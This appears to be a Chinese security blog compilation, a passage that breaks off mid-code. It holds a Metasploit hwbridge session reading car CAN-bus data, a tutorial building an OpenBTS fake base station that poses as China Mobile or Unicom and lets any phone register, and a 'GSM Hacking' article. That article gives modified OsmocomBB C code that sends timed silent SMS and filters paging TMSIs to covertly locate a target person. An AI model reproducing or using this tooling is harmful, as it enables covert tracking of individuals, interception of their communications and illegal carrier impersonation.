  1   hwbridge cmd/hardware  automotive   127.0.0.1 -> 127.0.0.1 (10.1.10.21)

设备连接后,就会建立一个HWBridge会话。如果你比较熟悉meterpreter的话,你就会习惯使用hwbridge。你可以输入help获取命令列表,或者运行指定模块如getvinfo(获取汽车信息)。

msf auxiliary(connect) > sess 1
[*] Starting interaction with 1...
hwbridge > supported_buses
Available buses
 
can0, can1, can2
 
hwbridge > run post/hardware/automotive/getvinfo CANBUS=can2
[*] Available PIDS for pulling realtime data: 46 pids
[*]   [1, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17, 19, 20, 21, 24, 25, 28, 31, 32, 32, 33, 44, 45, 46, 47, 48, 49, 50, 51, 60, 61, 64, 65, 66, 67, 68, 69, 70, 71, 73, 74, 76]
[*]   MIL (Engine Light) : OFF
[*]   Number of DTCs: 0
[*]   Engine Temp: 48 °C / 118 °F
[*]   RPMS: 0
[*]   Speed: 0 km/h  /  0.0 mph
[*] Supported OBD Standards: OBD and OBD-II
[*] Mode $09 Vehicle Info Supported PIDS: [2, 4, 6, 8]
[*] VIN: 1G1ZT53826F109149
[*] Calibration ID: UDS ERR: {"RCRRP"=>"Request Correctly Received, but Response is Pending"}
[*] PID 6 Response: ["00", "00", "C4", "E9", "00", "00", "17", "33", "00", "00", "00", "00"]
[*] PID 8 Response: ["00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00"]

即将加入更多硬件模式

据悉,Metasploit 开源社区迄今已包含 1,600 漏洞和 3,300 模块,管理Metasploit工具的Rapid7公司表示,之后还会加入其他功能。

logo

详细信息请查阅:

http://opengarages.org/hwbridge/#get-a-list-of-methods

https://www.rapid7.com/about/press-releases/rapid7-enables-iot-hardware-security-testing-with-metasploit/

https://community.rapid7.com/community/transpo-security/blog/2017/02/02/exiting-the-matrix

http://www.darkreading.com/vulnerabilities—threats/metasploit-can-now-be-directly-linked-to-hardware-for-vulnerability-testing/d/d-id/1328047

按捺不住了吧,试试?O(∩_∩)O~

转自:

微信公众号:开源恶意代码基准测试

使用OpenBTS基站测试物联网模块 IoT Module fuzzing with OpenBTS

cn0xroot11条评论

0x00 引子

近年来,随着云计算、物联网技术的快速发展,物联网的理念和相关技术产品已经广泛渗透到社会经济民生的各个领域,越来越多的穿戴设备、家用电器通过蓝牙、Wi-Fi、Li-Fi、z-wave、LoRa等技术接入互联网,成为联网的终端设备。

但是由于这些技术普遍为短距离无线通信技术,通常被设计用于室内和短距离使用,在室外尤其是非视距下性能表现非常差,而作为现有成熟的GSM(Global System for Mobile Communication)技术,因其网络在全国范围内实现了联网和漫游,在网络资源、传输特性及数据可靠性等方面的优势,提供了一个机动、灵活、可靠的远距离传输方式,所以使用GSM模块联网的方案也被广泛使用。

0x01 测试短板

针对短距离无线通信技术的测试方法有很多,同时也被大家所悉知、使用,所以这里不再一一详述。而对于通过使用2G/GSM、3G/UMTS以及4G/LTE基站联网通信的设备,例如智能电表、POS机、抓娃娃机、自动售货机这些硬件的测试方法、技巧却是寥寥无几,几乎一片空白。

本文将分享如何通过SDR加开源项目搭建伪基站并使用伪基站的GPRS功能作为网关来进行GSM/GPRS网络测试,并对GSM模块的硬件流量进行拦截、分析、重放等。

0x02 环境搭建

下载Ubuntu-16.04-desktop-i386.iso,安装使用一台全新的机器,防止因依赖问题导致的报错。

2.1 更新

sudo apt-get install software-properties-common python-software-properties
sudo add-apt-repository ppa:git-core/ppa
sudo apt-get update
sudo apt-get install git

2.2 搭建OpenBTS开发环境

mkdir sdr  //新建sdr文件夹
cd sdr  //进入该文件夹
git clone https://github.com/RangeNetworks/dev.git
cd dev
./clone.sh  //从GitHub克隆代码
./switchto.sh master  //切到master分支
./build.sh B200

编译下载的源码,因为使用的是USRP B200 build脚本后加SDR硬件 ,如果使用的是USRP N200 则执行./build.sh N200(过程中需从谷歌下载源码,建议全程翻墙,否则会报错!)

编译过程根据网络、机器性能而异,通常在30-45分钟左右,编译完成后,ubuntu自动安装GnuRadio、USRP的UHD驱动等相关SDR环境,但USRP的固件还需手动下载:

$sudo python /usr/lib/uhd/utils/uhd_images_downloader.py
Images destination:      /usr/share/uhd/images
Downloading images from: http://files.ettus.com/binaries/images/uhd-images_003.009.002-release.zip
Downloading images to:   /tmp/tmpEplLOD/uhd-images_003.009.002-release.zip
26296 kB / 26296 kB (100%)

Images successfully installed to: /usr/share/uhd/images

$ uhd_usrp_probe
linux; GNU C++ version 5.3.1 20151219; Boost_105800; UHD_003.009.002-0-unknown

-- Loading firmware image: /usr/share/uhd/images/usrp_b200_fw.hex...
-- Detected Device: B200
-- Loading FPGA image: /usr/share/uhd/images/usrp_b200_fpga.bin... done
-- Operating over USB 2.
-- Detecting internal GPSDO.... No GPSDO found
-- Initialize CODEC control...
-- Initialize Radio control...
-- Performing register loopback test... pass
-- Performing CODEC loopback test... pass
-- Asking for clock rate 16.000000 MHz...
-- Actually got clock rate 16.000000 MHz.
-- Performing timer loopback test... pass
-- Setting master clock rate selection to 'automatic'.
  _____________________________________________________
 /
|       Device: B-Series Device
|     _____________________________________________________
|    /
|   |       Mboard: B200
|   |   revision: 5
|   |   product: 1
|   |   serial: 30EA064
|   |   name: MyB200
|   |   FW Version: 8.0
|   |   FPGA Version: 13.0
|   |
|   |   Time sources: none, internal, external, gpsdo
|   |   Clock sources: internal, external, gpsdo
|   |   Sensors: ref_locked
|   |     _____________________________________________________
|   |    /
|   |   |       RX DSP: 0
|   |   |   Freq range: -8.000 to 8.000 MHz
|   |     _____________________________________________________
|   |    /
|   |   |       RX Dboard: A
|   |   |     _____________________________________________________
|   |   |    /
|   |   |   |       RX Frontend: A
|   |   |   |   Name: FE-RX1
|   |   |   |   Antennas: TX/RX, RX2
|   |   |   |   Sensors: temp, rssi, lo_locked
|   |   |   |   Freq range: 50.000 to 6000.000 MHz
|   |   |   |   Gain range PGA: 0.0 to 76.0 step 1.0 dB
|   |   |   |   Bandwidth range: 200000.0 to 56000000.0 step 0.0 Hz
|   |   |   |   Connection Type: IQ
|   |   |   |   Uses LO offset: No
|   |   |     _____________________________________________________
|   |   |    /
|   |   |   |       RX Codec: A
|   |   |   |   Name: B200 RX dual ADC
|   |   |   |   Gain Elements: None
|   |     _____________________________________________________
|   |    /
|   |   |       TX DSP: 0
|   |   |   Freq range: -8.000 to 8.000 MHz
|   |     _____________________________________________________
|   |    /
|   |   |       TX Dboard: A
|   |   |     _____________________________________________________
|   |   |    /
|   |   |   |       TX Frontend: A
|   |   |   |   Name: FE-TX1
|   |   |   |   Antennas: TX/RX
|   |   |   |   Sensors: temp, lo_locked
|   |   |   |   Freq range: 50.000 to 6000.000 MHz
|   |   |   |   Gain range PGA: 0.0 to 89.8 step 0.2 dB
|   |   |   |   Bandwidth range: 200000.0 to 56000000.0 step 0.0 Hz
|   |   |   |   Connection Type: IQ
|   |   |   |   Uses LO offset: No
|   |   |     _____________________________________________________
|   |   |    /
|   |   |   |       TX Codec: A
|   |   |   |   Name: B200 TX dual DAC
|   |   |   |   Gain Elements: None

编译完成后也会在BUILD目录下生成一个以编译时间为名的文件,如果系统为32bit编译后则在该目录下生成i386.deb的软件包,如果系统为64bit则生成amd64.deb :

2.3 更新&安装依赖包

sudo apt-get install software-properties-common python-software-properties
sudo add-apt-repository ppa:chris-lea/zeromq
sudo apt-get update

2.4 安装编译完成的DEB软件包

需注意是否有报错:

cd dev/BUILD/2016-11-29--23-23-16
sudo dpkg -i libcoredumper1_1.2.1-1_i386.deb libcoredumper-dev_1.2.1-1_i386.deb
sudo dpkg -i  liba53_0.1_i386.deb
sudo dpkg -i range-configs_5.0_all.deb
sudo dpkg -i range-asterisk*.deb
sudo apt-get install -f
sudo dpkg -i sipauthserve_5.0_i386.deb
sudo apt-get install -f
sudo dpkg -i smqueue_5.0_i386.deb
sudo apt-get install -f
sudo dpkg -i openbts_5.0_i386.deb
sudo apt-get install -f

0x03 开启数据转发、配置iptables

因为OpenBTS基站的GPRS网络流量是基于PC机,所以在开启基站GPRS功能前,需要开启数据包转发以及配置Iptables防火墙规则。

3.1 开启数据包转发:

ubuntu开数据转发需以root身份执行,如果不是root用户,即使使用sudo也无法开启:

sudo su 
echo 1 >> /proc/sys/net/ipv4/ip_forward

3.2 配置iptables规则:

/etc/OpenBTS/iptables.rules 配置规则文件内容如下:

# Generated by iptables-save v1.4.4
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
# Generated by iptables-save v1.4.4
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT

某些情况下机器的网卡并非eth0 ,所以需要根据自身实际情况,灵活地修改配置文件。

sudo iptables-restore < /etc/OpenBTS/iptables.rules

iptables -t nat -L -n -v

3.3 加载数据库

cd sdr/dev/openbts/apps
sudo sqlite3 -init OpenBTS.example.sql /etc/OpenBTS/OpenBTS.db ".quit"

cd sdr/dev/subscriberRegistry/apps
sudo sqlite3 -init sipauthserve.example.sql /etc/OpenBTS/sipauthserve.db ".quit"

cd sdr/dev/smqueue/smqueue
sudo sqlite3 -init smqueue.example.sql /etc/OpenBTS/smqueue.db ".quit"

3.4 配置asterisk

Asterisk是运行在Linux上来实现用户电话交换的IP-PBX系统开源软件,支持各种的VOIP协议。Asterisk提供了很多以前只有昂贵、专业的PBX系统才支持的功能,如:会议电话、语音信箱、交互式语音应答、自动电话转接。

在/etc/asterisk/目录中需要修改sip.conf、extensions.conf 具体方法:将手机的IMSI国际用户识别码和分配的号码登记数据asterisk中,也就是将数据写入sip.conf、extensions.conf两个配置文件。

SIP.CONF:

[IMSI46001658*****19]
callerid=2000003
canreinvite=no
type=friend
allow=gsm
context=sip-external
host=dynamic
dtmfmode=info

[IMSI41004030*****62]
callerid=2000004
canreinvite=no
type=friend
allow=gsm
context=sip-external
host=dynamic
dtmfmode=info

callerid=2000003,表示将IMSI为46001658*****19的手机分配号码2000003;

canreinvite=no,表示被呼叫的手机一旦建立连接后OpenBTS将不再发送重新邀请的指令;

context=sip-external,表示允许外部未分配号码的匿名电话呼入。

0x04 启动基站:

4.1 执行 transceiver连接SDR硬件

cd sdr/dev/openbts/Transceiver52M
sudo ./transceiver

4.2 执行OpenBTS启动基站

cd sdr/dev/openbts/apps/
sudo ./OpenBTS

4.3 执行smqueue,启用短信服务

cd sdr/dev/smqueue/smqueue
sudo ./smqueue

4.4 执行sipauthserve,启用鉴权服务

cd sdr/dev/subscriberRegistry/apps
sudo ./sipauthserve

4.5 asterisk -vvvc or asterisk -r

Clipboard Image.png

4.6 启动OpenBTS终端控制台:

cd sdr/dev/openbts/apps
sudo ./OpenBTSCLI


root@0xroot:/home/init3/sdr/dev/openbts/apps# ./OpenBTSCLI
OpenBTS Command Line Interface (CLI) utility
Copyright 2012, 2013, 2014 Range Networks, Inc.
Licensed under GPLv2.
Includes libreadline, GPLv2.
Connecting to 127.0.0.1:49300...
Remote Interface Ready.
Type:
 "help" to see commands,
 "version" for version information,
 "notices" for licensing information,
 "quit" to exit console interface.
OpenBTS> version
release 5.0-master+c438a5a689 CommonLibs:76b71d509b+GPRS P built 2016-11-29T23:31:19

OpenBTS> help

Type "help" followed by the command name for help on that command.

alarms      audit       calls
cbs     cellid      chans
config      crashme     devconfig
endcall     freqcorr    gprs
handover    help        load
memstat     neighbors   noise
notices     page        power
rawconfig   regperiod   restart
rmconfig    rxgain      sendsimple
sendsms     sgsn        shutdown
stats       sysinfo     tmsis
trxfactory  txatten     unconfig
uptime      version

OpenBTS>

0x05 配置基站

GSM 900频段瀑布图:

Clipboard Image.png

gr-gsm &Kal扫描GSM基站

Clipboard Image.png

刚搭建完成的基站由于天线功率过大以及手机跟基站的距离太近等原因,可能会导致手机不能正常加入到基站,这时需要配置加入基站的条件以及设置天线功率:

允许任意机器接入:

OpenBTS> config Control.LUR.OpenRegistration .*
Control.LUR.OpenRegistration changed from "" to ".*"

设置天线功率:

OpenBTS> devconfig GSM.Radio.RxGain 18
GSM.Radio.RxGain changed from "50" to "18"
GSM.Radio.RxGain is static; change takes effect on restart

设置基站频段:

OpenBTS> config GSM.Radio.Band 900
GSM.Radio.Band changed from "850" to "900"
GSM.Radio.Band is static; change takes effect on restart 

设置欢迎短信:

config Control.LUR.NormalRegistration.Message Welcome to BTS 1

设置基站名:

config GSM.Identity.ShortName GroundControl

将基站设置为测试网络:

config Identity config GSM.Identity.MCC 001

将基站设置为国内: MCC460 为中国

config GSM.Identity.MCC 460

设置运营商为联 * 通:

config GSM.Identity.MNC 01 

设置运营商为移 * 动:

config GSM.Identity.MNC 00 

设置ARFCN、LAC、BCC

网络色码,NCC,一般用于标识运营商;基站色码,BCC,区分同一运营商下的相同BCCH的不同基站。

一般采用BCCH频点和BSIC来联合标识小区,BSIC=NCC+BCC。在TD和WCDMA里,存在PLMN,PLMN=MCC+MNC,其中MCC为移动国家码,MNC为移动网络码标识运营商。

基站切换的时候,主要是通过CI、BCCHBSIC等信息寻找目标小区,当同时检测到邻区列表里出现同BCCH同扰码组的小区时,容易出现切换失败。

OpenBTS> config GSM.Radio.C0 168
GSM.Radio.C0 changed from "151" to "168"
GSM.Radio.C0 is static; change takes effect on restart
OpenBTS> config GSM.Identity.BSIC.BCC 3
GSM.Identity.BSIC.BCC changed from "2" to "3"

OpenBTS> config GSM.Identity.LAC 1001
GSM.Identity.LAC changed from "1000" to "1001"
OpenBTS> config GSM.Identity.CI 11
GSM.Identity.CI changed from "10" to "11"

用户管理

在3.4配置asterisk再我们给部分用户配置了callerid号码,启动OpenBTS后可通过NodeManager目录下的nmcli.py脚本进行用户管理:

cd sdr/dev/openbts/NodeManager/

添加用户示例:

./nmcli.py sipauthserve subscribers create name imsi msisdn

将123456 (MSISDN码)分配到IMSI 码为46001658*****19的LG G3设备中

./nmcli.py sipauthserve subscribers create "LG G3" IMSI46001658*****19 123456

读取已录入信息:

root@0xroot:/home/init3/sdr/dev/openbts/NodeManager#./nmcli.py sipauthserve subscribers read
raw request: {"command":"subscribers","action":"read","key":"","value":""}
raw response: {
    "code" : 200,
    "data" : [
        {
            "imsi" : "IMSI46001658*****19",
            "msisdn" : " 123456",
            "name" : "LG G3"
        },
        {
            "imsi" : "IMSI46000645*****91",
            "msisdn" : " 223456",
            "name" : "MoTo"
        }
    ]
}

启用GPRS功能:

OpenBTS> config GPRS.Enable 1

设置基站DNS服务器:

OpenBTS> config GGSN.DNS 8.8.8.8

编辑/etc/resolv.conf

nameserver 8.8.8.8

为防止机器重启或重启网络后/etc/resolv.conf文件被重写复原,可修改/etc/resolvconf/resolv.conf.d/head

nameserver 8.8.8.8

设置GGSN日志存放路径:

OpenBTS> devconfig GGSN.Logfile.Name /tmp/GGSN.log

查看已加入基站的设备:

OpenBTS> tmsis
IMSI            TMSI IMEI            AUTH CREATED ACCESSED TMSI_ASSIGNED
46001658*****19 -    354834060*****0 1    30m     30m      0

查看日志:cat /var/log/OpenBTS.log

配置文件:/etc/rsyslog.d/OpenBTS.conf

发送短信:sendsms $IMSI $号码  “$内容”

sendsms 46001658*****19 888888 "Hello World"

OpenBTS对中文支持不是很友好,发送汉字文本信息将出现乱码:

OpenBTS+Burp suite

使用Burp拦截硬件流量请求的方法这里可参考NCC Group的一篇博客:GSM/GPRS Traffic Interception for Penetration Testing Engagements

0x06 硬件调试

硬件芯片模块

G510-Q50-00 Pin Definitoins

Clipboard Image.png

焊接TTL进行调试:

串口调试:

Clipboard Image.png

0x07 refer

GSM/GPRS Traffic Interception for Penetration Testing Engagements

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/may/gsmgprs-traffic-interception-for-penetration-testing-engagements/

Getting Started with OpenBTS

PDF:    http://openbts.org/site/wp-content/uploads/ebook/Getting_Started_with_OpenBTS_Range_Networks.pdf

HTML:https://www.safaribooksonline.com/library/view/getting-started-with/9781491924280/ch04.html

OpenBTS Application Suite Release 4.0 User Manual

http://openbts.org/site/wp-content/uploads/2014/07/OpenBTS-4.0-Manual.pdf

OpenBTS BuildInstallRun

http://openbts.org/w/index.php?title=BuildInstallRun

http://openbts.org/w/index.php?title=OpenBTS-UMTS
https://wush.net/trac/rangepublic/wiki/GPRS
How to get 3G working on the UmTRX

https://fairwaves.co/blog/openbts-umts-3g-umtrx/

FIBOCOM G510

http://www.fibocom.com/product/2-1-2-1.html

FIBOCOM G510 Q50-00

http://www.tme.eu/gb/details/g510-q50-00/gsmgpsgprshspaedgelte-modules/fibocom/g510-q50-00/

http://www.fibocom.com/upfile/down/document_2_1_2_1.pdf

http://www.tme.eu/gb/Document/fabb43e22a46fba821931db19e577988/FIBOCOM_G510_U_M.pdf

http://www.mouser.cn/ProductDetail/STMicroelectronics/STM32F103C8T6/?qs=bhCVus9SdFtq6kqxsU5%2FDA%3D%3D

GSM Hacking:静默短信(Silent SMS)在技术侦查中的应用

cn0xroot一条评论

Author:fl00der https://twitter.com/xdzou

GSM Hacking:The application of Silent SMS in technical investigation

GSM 基站

0x00 前言

技术侦查时我们经常需要对目标人物进行定位,监听目标人物的电话和短信。

如何做到呢?首选当然是高大上的7号信令系统(SS7)。你需要一个能够访问的支持MAP(Mobile Application Part)的SS7信令接入点,然后,你理论上就可以侦听,拦截,伪造全球任何移动用户的电话和短信了,也可以获得该手机当前接入的Cell ID从而精确定位。因为全球的电信运营商都连在一张信令网上,除非某些运营商做了信令过滤,否则不管你从哪个国家接入SS7,命令在全球运营商那里都会得到忠实执行。目前国际上常见的SS7信令接入点的租用价格是每月几千美元起,对机构来说并不是很贵。

科普:

SilentSMS:静默短信

信令系统#7(SS7:Signaling System #7)由 ITU-T 定义的一组电信协议,主要用于为电话公司提供局间信令。SS7 中采用的是公共信道信令技术(CCS:common-channel signaling),也就是带外(out-of-band)信令技术,即信令服务提供独立的分组交换网络。

MAP:Mobile Application Part (移动应用部分)七号信令的子集。用于连接分布式交换单元(MSC)和主数据库(HLR)。HLR能动态存储移动网络用户的当前位置和预置文件。在处理拨入呼叫的过程中需要使用HLR。当网络用户位置改变时,HLR也要相应更新,用户便由网络中的其他交换机服务。

MAP协议的主要内容包括移动性管理、呼叫业务处理、补充业务处理、短消息业务处理、操作维护和GPRS业务处理等。

Clipboard Image.png

但我们既不是国家机器,也不是土豪,我们只是一个普通的朝阳群众,怎么低成本的推动世界和平,保卫国家安全,以及对公众人物进行监督呢?

打开世界五大王牌情报组织之一朝阳群众的野战工具箱,我们会看到很多民间自制的情报工具,本文介绍其中的Slient SMS的低成本实现方法和简单应用。

其实,Silent SMS在各国执法部门都大量使用,即使他们同时也在使用SS7,比如柏林警方去年的发送数量就超过了10万。和SS7只能定位到基站不同,Silent SMS配合伪基站+三角定位法,开阔空间定位精度可以达到1米左右,实战中可以直接定位到广场上的某个人。这样即使目标人物使用了易容术,随身携带的手机也会不知不觉的告诉我们真相。

0x01 背景知识

手机号码(MSISDN)在移动通信网上是很少进行传输的。对于移动网络来说,区别不同手机的惟一ID是IMSI(International Mobile Subscriber Identity)。MSISDN是为了方便人类而做的一个IMSI在现实世界的映射。你打电话发短信时提交的是对方的MSISDN,移动网络收到你的请求后要把MSISDN映射回IMSI,然后才能处理。你接电话收短信时对方的MSISDN也是单独发送给你的,好让你能知道知道对方是谁。

而为了保护安全和隐私,IMSI在设计上也是尽量少的在网络上传输的,通常情况下只在首次Attach和越区切换位置更新时才需要向移动网络提交你的IMSI。当移动网络确认你的合法身份后会指派一个临时身份给你,在GSM网络里是TMSI(Temporary Mobile Subscriber Identity),在LTE里是S-TMSI(为了简化我们也把它称作TMSI),之后在需要身份识别的时候,都是用TMSI的。

科普:

IMSI(International Mobile Subscriber Identity,国际移动用户识别码)用于在全球范围唯一标识一个移动用户。一个IMSI唯一标识一个移动用户,在全世界都是有效的。

无线网络覆盖的范围很大,如果IMSI在网络中传递时被不法分子获取,这个是非常危险的。所以需要采用另外一种号码临时代替IMSI在网络中进行传递,这就是TMSI(Temporary Mobile Subscriber Identity,临时移动用户标识)。采用TMSI来临时代替IMSI的目的为了加强系统的保密性,防止非法个人或团体通过监听无线路径上的信令窃取IMSI或跟踪用户的位置。

所以,在我们侦听移动通信时会发现,上行的通信请求,不管是发短信还是打通话,只能侦听到发起者的TMSI和接收者的MSISDN;而下行的通信,不管是来电话还是来短信,只能侦听到发起者的MSISDN和接收者的TMSI。这样,如果我们不能找出TMSI和MSISDN的一一对应关系,我们就没法区分出哪些短信和通话是指向我们的目标人物的。

而找出了TMSI和MSISDN的对应关系,也就能通过侦听知道目标手机当前连在哪个蜂窝基站,从而实现对目标人物的定位。

扩展阅读

关于这里提到的定位的姿势可以看《从无线电角度揭秘定位劫持》一文的基站定位部分。

0x02 原理

当有新的Mobile Terminated Services,通常是短信或来电,要传送的时候,移动网络会发起Paging。目标手机守听时发现网络在呼叫自己的TMSI,就会向网络申请一个信道,申请成功后,手机转到该信道发送呼叫响应,网络回复该呼叫响应,然后经过鉴权、加密协商等流程后,网络开始向手机传送服务,这时手机才知道来的是电话还是短信,在收到一部分服务信息后,手机开始决定是否提示用户和如何提示用户,是来电话了还是收到短信了,是振铃还是震动等。

我们试图在不惊动目标人物的情况下找出TMSI和MSISDN的对应关系,依靠的就是Paging。根据以上流程我们可以看到,如果我们电话呼叫目标手机,在一个合适的时间点,即网络上已经广播了Paging信息,但目标手机还未振铃之前及时挂断,目标手机也是没有提示的,而我们却侦听到了一次Paging。如果能按照一定的时间间隔和多次重复这个过程,我们就能从侦听到的大量Paging广播中筛查出目标TMSI。问题在于,这个合适的时延比较难把握,而且不同运营商,甚至不同区域的网络还有差异,调校起来比较费事。这时,Silent
SMS就成了我们的首选。

Silent SMS是一种特殊格式的短信,在短信报文头上设置特殊的标识位以后,接收者手机收到后不会有任何提示和反应,也不会存储短信内容,而是直接丢弃。不使用特殊技术手段无法发现手机收到了Silent SMS。向目标手机发送Silent SMS,我们会侦听到网络广播的Paging信息,但是不需要像电话呼叫那样顾虑时延和及时挂断的问题,目标手机上不会有任何提示。而且我们还可以在空中侦听到短信的完整内容,当侦听到我们自己构造的特定内容的短信可以帮我们进一步确认该TMSI就是我们的目标。

TMSI是在一个LAC(Location Area Code)/TA(Tracking Area)里有效的,每当进入一个新的LAC/TA,手机就会被网络指派一个新的TMSI。要找出的对应关系,必须侦听目标手机当前所在的LAC/TA。对我们有利的是,Paging也是在LAC/TA里有效的,除了LTE的Smart Paging。

0x03 低成本实现

朝阳群众的情报工具应该尽可能的便宜,所以我们使用开源软件+廉价设备的方式。我们优选的方案是OsmocomBB + Motorola C118/C139。

网上能找到国外黑客写的用Python调用USB短信猫发送Silent SMS,用Airprobe + RTL-SDR接收的源代码,但是硬件成本比我们的贵,最关键是代码比较散。

OsmocomBB:基于一套泄露的基带源代码重写的开源的GSM基带项目,只能支持TI Calypso基带处理器。被用来参考的那套泄露源代码不完整,只有90+%的源代码,部分连接库没有源代码,而且也缺少DSP的代码。OsmocomBB被设计成黑客的实验工具,而不是供普通用户使用的手机系统,为了方便编写和修改,其Layer 2和3是在PC上运行的。

Motorola C118/C139:玩GSM必备,天然支持跳频,便宜,淘宝只要7元,可大量购买,接在USB Hub上,实现多路短信收发。其中,C139是彩屏,且ROM大些,是有潜力改造成用于复杂GSM攻击或工程路测,且支持中文显示和输入的黑客手机的。

具体实现上,我们需要使用两部C118/C139手机,一部用来发送Silent SMS,另一部用来侦听PCH并记录正在呼叫的TMSI。

C118(左)和C139(右)兄弟合影:

C118&C139.jpg

用来将C118/C139连接到电脑的CP2102(USB串口转换器)及2.5mm音频插头:

CP2102.jpg

0x04 如何发送Silent SMS

OsmocomBB里的mobile程序是工作在Layer 2-3,用来收发短信和接打电话的。我们就修改它来发送Silent SMS。其实,可以把C118/C139看做是最便宜的短信猫,而修改过的mobile程序就是短信群发软件。

构造Silent SMS

每个短信都有一个TP-Protocol-Identifier字段,只要设置为0x40就相当于告知接收手机忽略此短信,所以目标手机会正常接收到这条短信,但是之后既不会提示也不会保存这条短信,只是简单的丢弃掉。每个短信还有一个TP-Data-Coding-Scheme字段,如果把首字节设为0xC0,接收手机同样会忽略此短信。

我们只要在发短信之前,把对应的字段做好设置,发出的就是Silent SMS了。这两个字段可以都设置,也可以只设置一个。偶尔会碰到运营商过滤特殊格式短信的情况,这时候就需要具体试一下到底哪个有效。我自己到目前为止没遇到过滤的情况。

主要数据结构

为了按特定时序发送Silent SMS,我们需要一个定时器。设定好时间间隔,定时器就会被定时触发,然后调用发送函数去发送一条Silent SMS。

struct osmo_timer_list tick_timer_smsping;
struct {
    int pid;
    int dcs;
} silent_sms;

主要源代码

vty_interface.c

//新增控制台命令:silent,用于设置TP-PID和TP-DCS
DEFUN(silent, silent_cmd, "silent TP-PID TP-DCS",
    "Set SMS messages header\n"
    "1 for 0x40, 0 for default\n"
    "1 for 0xC0, 0 for default\n")
{
    int pid;
    int dcs;

    if (argc >= 1) {
        pid = atoi(argv[0]);
        dcs = atoi(argv[1]);
        if (pid) {
            silent_sms.pid = 1;
        } else {
            silent_sms.pid = 0;
        }
        if (dcs) {
            silent_sms.dcs = 1;
        } else {
            silent_sms.dcs = 0;
        }
    }

    return CMD_SUCCESS;
}

发送部分的源代码:

if(smscnt == MAX_SMS_Count){//开始批量发送
        tick_timer_smsping.cb = &sms_ping; //初始化定时器
        tick_timer_smsping.data = &timer_step;
        
        smscnt--;
        ping_sms_sca = strdup(sms_sca);
        ping_number = strdup(number);
        ping_sms_txt = strdup(argv_concat(argv, argc, 2));
        call_vty = vty;
        sms_send(ms, sms_sca, number, argv_concat(argv, argc, 2));
        vty_out(vty, "Slient SMS %d sent%s", smscnt, VTY_NEWLINE);
    }

gsm411_sms.c

struct gsm_sms *sms_from_text(const char *receiver, int dcs, const char *text)
{
    struct gsm_sms *sms = sms_alloc();

    if (!sms)
        return NULL;

    strncpy(sms->text, text, sizeof(sms->text)-1);

    sms->reply_path_req = 0;
    sms->status_rep_req = 0;
    sms->ud_hdr_ind = 0;
    if (silent_sms.pid)
        sms->protocol_id = 0x40; /* type 0 */
    else
        sms->protocol_id = 0; /* implicit */
    if (silent_sms.dcs)
        sms->data_coding_scheme = 0xC0;
    else
        sms->data_coding_scheme = dcs;
    strncpy(sms->address, receiver, sizeof(sms->address)-1);
    /* Generate user_data */
    sms->user_data_len = gsm_7bit_encode(sms->user_data, sms->text);

    return sms;
}

用来重复发送的源代码:

void sms_ping(void *data)
{
    struct osmocom_ms *ms;

    ms = get_ms("1", call_vty);
    vty_notify(ms, "ping sent");

    if(smscnt == 0){
        return 0;
    }

    sms_send(ms, ping_sms_sca, ping_number, ping_sms_txt);
    smscnt--;
    return 0;
}
static int gsm411_sms_report(struct osmocom_ms *ms, struct gsm_sms *sms,
    uint8_t cause)
{
    vty_notify(ms, NULL);
    if (!cause){
        vty_notify(ms, "SMS %d to %s successfull\n", smscnt, sms->address);
        if(smscnt != 0)
            osmo_timer_schedule(&tick_timer_smsping, 10, 0);//定时间隔10秒

    }else
        vty_notify(ms, "SMS to %s failed: %s\n", sms->address,
            get_value_string(gsm411_rp_cause_strs, cause));
    
    return 0;
}

使用mobile的命令行发送Silent SMS:

sendslientsms.jpg

使用WireShark侦听发送的短信,可以看到TP-PID和TP-DCS分别是0x40,0xC0,短信内容为“testing 1 2 3”:

sendsniff.jpg

0x05 如何筛选TMSI

OsmocomBB里的ccch_scan程序经常被大家用来侦听短信。我们修改它来筛选排查出可能的目标TMSI。

在开始发送Silent SMS的时候,就立刻启动ccch_scan记录所有Paging的TMSI。通常,从开始发短信,到空中出现Paging信息,最快3秒钟,多数情况6-7秒钟。繁忙的基站每秒广播20多次寻呼。所以我们把TMSI队列深度设为300是足够的,大约可记录从发送Silent SMS开始15秒内的所有被呼叫的TMSI,这300个里面一定有我们的目标的TMSI,通常是在前面开始部分。队列到300为止,我们就是在这300个里面找出来重复次数大于我们设定次数的TMSI并打印出来。

数据结构

struct _tmsis_ {
    uint8_t     tmsi[4];
    char        cnt;
} tmsis[300];

列出TMSI的源代码

void tmsi_match(uint8_t *t)
{
    if(app_state.finding==1){
        int i;
        int f=0;
        for(i=0; i  app_state.mincnt){
                    printf("Possible TMSI: #%d, \t%s, %d times\n", i, osmo_hexdump(t,4), tmsis[i].cnt);
                }
            }
        }
        if((f==0)&&(app_state.tmsicnt<300)){//队列深度       
            app_state.tmsicnt += 1;
            memcpy(tmsis[i].tmsi,t,4);
            tmsis[i].cnt = 1;
            printf("New TMSI:#%d, %s \tTotal: %d\n", i, osmo_hexdump(t,4), app_state.tmsicnt);
        }
        return;
    }
    
    if(!memcmp(t, app_state.wanted_tmsi, 4)) {
        app_state.tmsi_matched = 1;
        printf("TMSI Match %s\n", osmo_hexdump(t,4));
    }
}

我们给ccch_scan新增加一个参数:-f paging次数。

国内不少地方为了提高接通率,当有Mobile Terminated Service要传递的时候是重复发出寻呼信息的,有的是Paging两次,多的甚至连续寻呼四次。这样如果你连续向目标手机发送10次短信,可能会侦听到20-40次Paging。所以你实战中你需要先侦听网络的PCH来以确定当地的设置情况。

static int l23_cfg_print_help()
{
    printf("\nApplication specific\n");
    printf("  -k --kc KEY           Key to use to try to decipher DCCHs\n");
    printf("  -t --tmsi TMSI        Filter assignments with specified TMSI (paging only)\n");
    printf("  -f --count        Filter paging TMSI\n");

    return 0;
}

static int l23_cfg_handle(int c, const char *optarg)
{
    switch (c) {
    case 'k':
        if (osmo_hexparse(optarg, app_state.kc, 8) != 8) {
            fprintf(stderr, "Invalid Kc\n");
            exit(-1);
        }
        break;
    case 't':
        if (osmo_hexparse(optarg, app_state.wanted_tmsi, 4) != 4) {
